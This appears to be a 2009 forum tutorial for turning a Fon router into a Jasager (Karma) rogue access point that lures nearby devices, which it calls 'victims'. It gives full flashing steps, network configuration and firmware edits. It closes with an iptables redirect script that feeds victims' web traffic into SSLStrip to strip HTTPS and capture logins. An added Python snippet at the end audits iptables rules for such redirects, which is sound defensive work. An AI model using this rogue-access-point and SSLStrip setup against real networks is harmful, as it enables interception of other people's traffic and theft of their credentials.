Netshroud
Posted December 30, 2009 (edited)

(I'm unsure as to how Step 1 works on a virgin Fon 2100. If it doesn't work, try the downgrading and patching to enable redboot as mentioned in Darren's guide.)

Part 1: Flashing the Fon+

The first step to installing Jasager is to flash the Fon with the Jasager firmware, which can be found at Digininja’s site (http://www.digininja.org/files/jasager_firmware_1.0.tar.bz2). To simplify the process, I’ll be using the nifty "Fon Flash" application at http://www.gargoyle-router.com/download.php

For some reason the Windows version failed to work for me (it was complaining about ARP sizes), so I used the Linux version off an Ubuntu 9.04 LiveCD. I haven’t tried the Windows version on anything other than Vista SP2 Business x64, so if it works for you, enjoy.

Untar the Jasager firmware to the directory of your choice, as well as the Fon Flash utility. For some reason Fon Flash failed to launch when I ran it from a Windows share, so I copied it to the desktop.

Next, run Fon Flash. If it complains about not finding interfaces, give it your password to sudo itself. Under Windows Vista/7, you probably need to run it with elevated privileges.

Make sure that the firmware type is set to "OpenWrt / Gargoyle", and select your Ethernet interface (if you have multiple ones, the one connected to the Fon). Point the Rootfs file to openwrt-atheros-root.squashfs, and the Kernel file to openwrt-atheros-xmlinux.lzma.

Next, open up a terminal. Make sure that your Ethernet interface is set to 192.168.0.254. Connect your system to the Fon’s LAN port via Ethernet. Disable any network manager you may have running. For Ubuntu, right-click on the network notification icon and uncheck "Enable Networking".

Switch back to the Fon Flash utility, and click "Flash Router Now!" Plug in the power to your Fon (or restart it), sit back and wait until you see the "Device flashed successfully" notification.
This took about 15 minutes for me, so go for a walk, read a book, or chat in #hakhouse.

Part 2: Configuring the Fon and network

Once the Fon is flashed, set your computer to an IP on the 192.168.1.0/24 range. Telnet into the Fon on 192.168.1.1. Run ‘passwd’ to set the root password, then disconnect. SSH into the Fon. Accept the host key, and log in as root with your new password.

First, you need to enable the wireless. The following commands will do this:

    uci set wireless.wifi0.disabled=0
    uci commit wireless && wifi

Next, pick an IP range and IP address for the Fon. I chose to use one on the private 172.16-32.X.Y range, because my home network is on the 10. range, and a couple of places I want to demo it at use 192.168. Execute the following commands to do as I did, and set the Fon to 172.20.0.2:

    uci set network.lan.ipaddr=172.20.0.2
    uci set network.lan.gateway=172.20.0.1
    uci set network.lan.dns=10.10.0.1
    uci commit network

(10.10.0.1 is my home router)

Also configure dnsmasq to give out the gateway IP and DNS servers. In /etc/config/dhcp, under the section config dhcp lan, add:

    list 'dhcp_option' '3,172.20.0.1'
    list 'dhcp_option' '6,10.10.0.1'

Reboot the Fon (the command via SSH is 'reboot'). Change your IP to be on the Fon’s range, then SSH into its new IP address. Accept the host key.

Now we need to set up Internet access on the Fon. When running Jasager, your network setup will/should look like this:

    Internet --> Router --> Computer --> Fon --> Victims

We need to configure the computer to share its internet connection with the Fon. Under Windows, just enable Internet Connection Sharing. Under Linux, execute:

    echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
    sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

where eth0 is your internet-facing interface.

If you’re doing what I did, and using a Virtual Machine for Jasager, you need to give it 2 virtual interfaces.
For VMware users, run vmnetcfg.exe (found in C:\Program Files (x86)\VMware\VMware Workstation\ for me). Make sure that one vmnet is bridged to your internet interface, and one is bridged to your Ethernet/Fon interface.

If you can now ping google.com from the Fon, move on. If not, make sure you have done everything correctly.

Next, I had to edit /karma/www/cgi-bin/functions.rb on the Fon to bridge ath0 correctly. Unless you’re fluent in vi, I would recommend installing nano.

    opkg update
    opkg install libncurses nano

In functions.rb, underneath:

    system("wlanconfig ath0 create wlandev wifi0 wlanmode master 2>&1 > /dev/null")

add:

    system("sleep 1")
    system("brctl addif br-lan ath0")

and replace:

    system("ifconfig", "ath0", "10.1.1.1", "up")

with:

    system("ifconfig", "ath0", "up")

Part 3 (Optional): Installing X-Wrt

The main reason I needed X-Wrt was that I couldn’t figure out how to change the time zone without it. To install X-Wrt, simply run:

    echo "src X-Wrt http://downloads.x-wrt.org/xwrt/kamikaze/8.09/atheros/packages" >> /etc/opkg.conf
    opkg update
    opkg install webif

Part 4: Running Jasager

Now connect over HTTP using your browser of choice to the Fon on port 1471. Log in with username "root" or "admin", and your root password. Click the big grey button, turn karma on, and wait for victims to get friendly with Jasager.

This is the script I use to share the internet on the Ubuntu VM, and start SSLStrip:

    echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null
    sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123
    sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    sudo ifconfig eth1 172.20.0.1 netmask 255.255.255.0
    sudo dhclient eth0
    python sslstrip-0.7/sslstrip.py -l 64123 -f sslstrip-0.7/lock.ico

Edited April 21, 2010 by Psychosis
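For anyone auditing a Linux gateway or VM for the NAT setup the post above builds, here is an added example (not part of the original post): it parses `iptables-save` nat-table output and flags a PREROUTING rule that redirects TCP port 80 to a local port, plus any MASQUERADE rule. The sample ruleset is constructed, and the function names `parse_rule`, `covers_port` and `audit_nat` are hypothetical.

```python
import shlex

# Constructed sample in iptables-save format (it prints --dport / --to-ports).
SAMPLE = """\
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 64123
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT
"""

def parse_rule(line):
    """Parse one '-A CHAIN ...' line into {option: value}; negated options get a '!' prefix."""
    tokens = shlex.split(line)
    rule, negate, i = {"chain": tokens[1]}, False, 2
    while i < len(tokens):
        tok = tokens[i]
        if tok == "!":
            negate = True
        elif tok.startswith("-"):
            key = ("!" if negate else "") + tok.lstrip("-")
            has_value = i + 1 < len(tokens) and not tokens[i + 1].startswith("-")
            rule[key] = tokens[i + 1] if has_value else ""
            negate = False
            i += 1 if has_value else 0
        i += 1
    return rule

def covers_port(spec, port):
    """True if a --dport/--dports value ('80', '80,8080', '1:1024') includes port."""
    for part in filter(None, spec.split(",")):
        lo, sep, hi = part.partition(":")
        if int(lo or 0) <= port <= (int(hi or 65535) if sep else int(lo)):
            return True
    return False

def audit_nat(ruleset, port=80):
    """Return (kind, detail, rule) findings for HTTP redirection and masquerading."""
    findings = []
    for line in (l for l in ruleset.splitlines() if l.startswith("-A ")):
        r = parse_rule(line)
        spec = r.get("dport") or r.get("dports") or ""
        if (r["chain"] == "PREROUTING" and r.get("j") == "REDIRECT"
                and r.get("p") == "tcp" and covers_port(spec, port)):
            findings.append(("http-redirect", r.get("to-ports"), line))
        elif r["chain"] == "POSTROUTING" and r.get("j") == "MASQUERADE":
            findings.append(("masquerade", r.get("o"), line))
    return findings
```

On a live host, pass it the text printed by `sudo iptables-save -t nat`; a port-80 redirect to a local port with no known proxy listening there is the finding to follow up.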